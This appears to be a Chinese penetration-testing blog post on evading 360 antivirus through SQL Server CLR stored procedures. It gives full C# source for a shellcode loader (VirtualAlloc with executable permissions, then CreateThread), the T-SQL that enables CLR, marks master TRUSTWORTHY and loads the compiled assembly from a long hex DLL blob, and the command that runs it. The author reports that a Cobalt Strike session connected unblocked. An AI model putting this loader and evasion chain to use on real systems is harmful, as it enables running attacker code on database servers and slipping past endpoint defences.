WEB

WEB安全

漏洞复现

CTF

常用工具

实战

代码审计

Javaweb

后渗透

内网渗透

免杀

进程注入

权限提升

漏洞复现

靶机

vulnstack

vulnhub

Root-Me

编程语言

java

逆向

PE

逆向学习

HEVD

PWN

CTF

heap

Windows内核学习

其它

关于博客

面试

杂谈

MSSQL CLR Bypass杀软

把h靶场整好之后有师傅来探讨没有web的环境,因为一般内网可能有弱口令,不过没有web服务

本来在sqlps还能用的情况下还是好过的,结果在那篇文章出来之后360直接把sqlps干掉了

后来碰到这样的情况又过不去了。。。。。。

最后再说几句废话,CLR是和UDF很像的东西,网上很多的文章都是创建cmd执行命令,因为在sqlserver下创建进程是会被拦截的,当时肤浅的以为CLR也没用了,现在再去看,想着都可以c#编程了直接写加载器把shellcode加载到内存不就可以了

0x01 配置

首先需要安装Visual Studio,找到Visual Studio Installer,点击修改找到数据存储和处理

勾选后点击右下角修改

打开Visual Studio创建Sql Server数据库项目

点击Properties,修改目标平台,选上创建脚本.sql文件

修改目标框架,像win2008要选.net3.5,权限级别修改为UNSAFE

然后到项目右键->新建项

然后就可以开始写代码了

0x02 代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
using System;
using Microsoft.SqlServer.Server;
using System.Runtime.InteropServices;


public partial class StoredProcedures
{
[Microsoft.SqlServer.Server.SqlProcedure]
public static void shellcode_loader(string sc)
{
// 在此处放置代码
SqlContext.Pipe.Send(shellcode_exec(sc));
}

public static string shellcode_exec(string sc)
{
byte[] sa = new byte[1000];
int shellcode_len = sc.Length / 2;
for (int i = 0; i < shellcode_len; i++)
{
string code = "0x" + sc.Substring(i * 2, 2);
int a = Convert.ToInt32(code, 16);
sa[i] = (byte)a;
}

UInt32 shellcodeAddress = VirtualAlloc(0, (UInt32)sa.Length, 0x1000, 0x40);
Marshal.Copy(sa, 0, (IntPtr)(shellcodeAddress), sa.Length);
CreateThread(0, 0, shellcodeAddress, 0, 0, 0);
return "";

}
[DllImport("kernel32")]
private static extern UInt32 VirtualAlloc(UInt32 lpAddress, UInt32 dwSize, UInt32 flAllocationType, UInt32 flProtect);

[DllImport("kernel32")]
private static extern UInt32 CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, UInt32 lpParameter, UInt32 dwCreationFlags, UInt32 lpThreadId);
}

这里主要还是模仿Y4大佬的,把cmd执行命令的函数改为了直接加载shellcode

在C#中使用下面的方法调用windowsapi

1
2
[DllImport("kernel32")]
private static extern UInt32 VirtualAlloc(UInt32 lpAddress, UInt32 dwSize, UInt32 flAllocationType, UInt32 flProtect);

往mssql传的参数需要为字符串,还需要将字符串转化为二进制的shellcode,使用for循环读二个字符然后转化为十六进制再存到数组中,最后循环完将shellcode放入开辟的内存中创建新线程执行

在bin文件加下面会生成sql文件

mssql中执行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
sp_configure 'clr enabled', 1
GO
RECONFIGURE
GO
ALTER DATABASE master SET TRUSTWORTHY ON;
GO
CREATE ASSEMBLY [MSSQL_ShellcodeLoader]
AUTHORIZATION [dbo]
FROM 0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C010300B11ABD620000000000000000E00022200B013000000A0000000600000000000042280000002000000040000000000010002000000002000004000000000000000400000000000000008000000002000000000000030040850000100000100000000010000010000000000000100000000000000000000000F02700004F00000000400000D802000000000000000000000000000000000000006000000C000000B82600001C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E746578740000004808000000200000000A000000020000000000000000000000000000200000602E72737263000000D80200000040000000040000000C0000000000000000000000000000400000402E72656C6F6300000C000000006000000002000000100000000000000000000000000000400000420000000000000000000000000000000024280000000000004800000002000500F0200000C8050000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000046280500000A0228020000066F0600000A2A000013300600770000000100001120E80300008D090000010A026F0700000A185B0B160D2B2772010000700209185A186F0800000A280900000A1F10280A00000A130406091104D29C0917580D090732D516068E6920001000001F4028030000060C0616086E280B00000A068E69280C00000A16160816161628040000062672070000702A1E02280D00000A2A0042534A4201000100000000000C00000076322E302E35303732370000000005006C00000004020000237E0000700200009802000023537472696E677300000000080500000C000000235553001405000010000000234755494400000024050000A400000023426C6F620000000000000002000001471502140900000000FA013300160000010000000D00000002000000050000000C0000000D000000040000000100000001000000020000000100000002000000000032010100000000000600B800E0010600D800E00106008E00AE010F0000020000060063024C010A00A20086010A00880286010A00750086010600F6004C0106000E014C01060080024C010600A7014C0106002A01C1010000000012000000000001000100010010000F0200001500010001005020000000009600690150000100642000000000960030005500020000000000800091203F005A00030000000000800091205A0062000700E720000000008618A10106000D00000001004C00000001004C00000001004302000002000701000003007D00000004006A0200000100200200000200FB00000003004D02000004007A01000005003302000006004F000900A10101001100A10106001900A1010A003100A101060039006C00100041006700150051001F01230051001501270051005C022D0059000A003300610074023900690093023E002900A1010600200023009D002E000B006C002E00130075002E001B0094001A000100000107003F000100000109005A00010004800000000000000000000000000000000053010000020000000000000000000000470027000000000002000000000000000000000047001B00000000000000006B65726E656C333200546F496E743332003C4D6F64756C653E0053797374656D2E44617461006D73636F726C6962007368656C6C636F64655F65786563005669727475616C416C6C6F63007363006C705468726561644964004372656174655468726561640053656E64006765745F506970650053716C5069706500666C416C6C6F636174696F6E547970650044656275676761626C654174747269627574650053716C50726F63656475726541747472696275746500436F6D70696C6174696F6E52656C61786174696F6E734174747269627574650052756E74696D65436F6D7061746962696C6974794174747269627574650042797465006477537461636B53697A6500647753697A6500537472696E6700537562737472696E67006765745F4C656E677468004D61727368616C004D5353514C5F5368656C6C636F64654C6F616465722E646C6C0053797374656D004D5353514C5F5368656C6C636F64654C6F61646572007368656C6C636F64655F6C6F61646572006C70506172616D65746572004D6963726F736F66742E53716C5365727665722E536572766572002E63746F7200496E745074720053797374656D2E446961676E6F73746963730053797374656D2E52756E74696D652E496E7465726F7053657276696365730053797374656D2E52756E74696D652E436F6D70696C6572536572766963657300446562756767696E674D6F6465730053746F72656450726F63656475726573006C70546872656164417474726962757465730064774372656174696F6E466C616773006C7041646472657373006C7053746172744164647265737300436F6E636174004F626A65637400666C50726F74656374006F705F4578706C6963697400436F6E766572740053716C436F6E7465787400436F7079000005300078000001000000005440DD77BEBA9F4F9089D8C505C8F570000420010108032000010520010111110400001221042001010E0807051D0508090808032000080520020E08080500020E0E0E050002080E08040001180A080004011D0508180808B77A5C561934E089040001010E0400010E0E0700040909090909090006090909090909090801000800000000001E01000100540216577261704E6F6E457863657074696F6E5468726F7773010801000200000000000401000000000000000000B11ABD6200000000020000001C010000D4260000D408000052534453CAE6AC7AFF811645BFDC99029CAFCF1901000000443A5C76735F636F64655C4D5353514C5F5368656C6C636F64654C6F616465725C4D5353514C5F5368656C6C636F64654C6F616465725C6F626A5C52656C656173655C4D5353514C5F5368656C6C636F64654C6F616465722E7064620000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001828000000000000000000003228000000200000000000000000000000000000000000000000000024280000000000000000000000005F436F72446C6C4D61696E006D73636F7265652E646C6C0000000000FF25002000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001001000000018000080000000000000000000000000000001000100000030000080000000000000000000000000000001000000000048000000584000007C02000000000000000000007C0234000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000000BD04EFFE00000100000000000000000000000000000000003F000000000000000400000002000000000000000000000000000000440000000100560061007200460069006C00650049006E0066006F00000000002400040000005400720061006E0073006C006100740069006F006E00000000000000B004DC010000010053007400720069006E006700460069006C00650049006E0066006F000000B801000001003000300030003000300034006200300000002C0002000100460069006C0065004400650073006300720069007000740069006F006E000000000020000000300008000100460069006C006500560065007200730069006F006E000000000030002E0030002E0030002E003000000054001A00010049006E007400650072006E0061006C004E0061006D00650000004D005300530051004C005F005300680065006C006C0063006F00640065004C006F0061006400650072002E0064006C006C0000002800020001004C006500670061006C0043006F0070007900720069006700680074000000200000005C001A0001004F0072006900670069006E0061006C00460069006C0065006E0061006D00650000004D005300530051004C005F005300680065006C006C0063006F00640065004C006F0061006400650072002E0064006C006C000000340008000100500072006F006400750063007400560065007200730069006F006E00000030002E0030002E0030002E003000000038000800010041007300730065006D0062006C0079002000560065007200730069006F006E00000030002E0030002E0030002E0030000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C000000443800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
WITH PERMISSION_SET = UNSAFE;

GO
CREATE PROCEDURE [dbo].[shellcode_loader]
@sc NVARCHAR (MAX)
AS EXTERNAL NAME [MSSQL_ShellcodeLoader].[StoredProcedures].[shellcode_loader]

然后执行

1
exec shellcode_loader 'shellcode'

可以看到360没有拦截上线cs了

接下来只需要进程迁移,不要在sqlserver下面创建进程就可以了

0x03 参考

https://y4er.com/post/mssql-execute-command-with-clr-assemblies/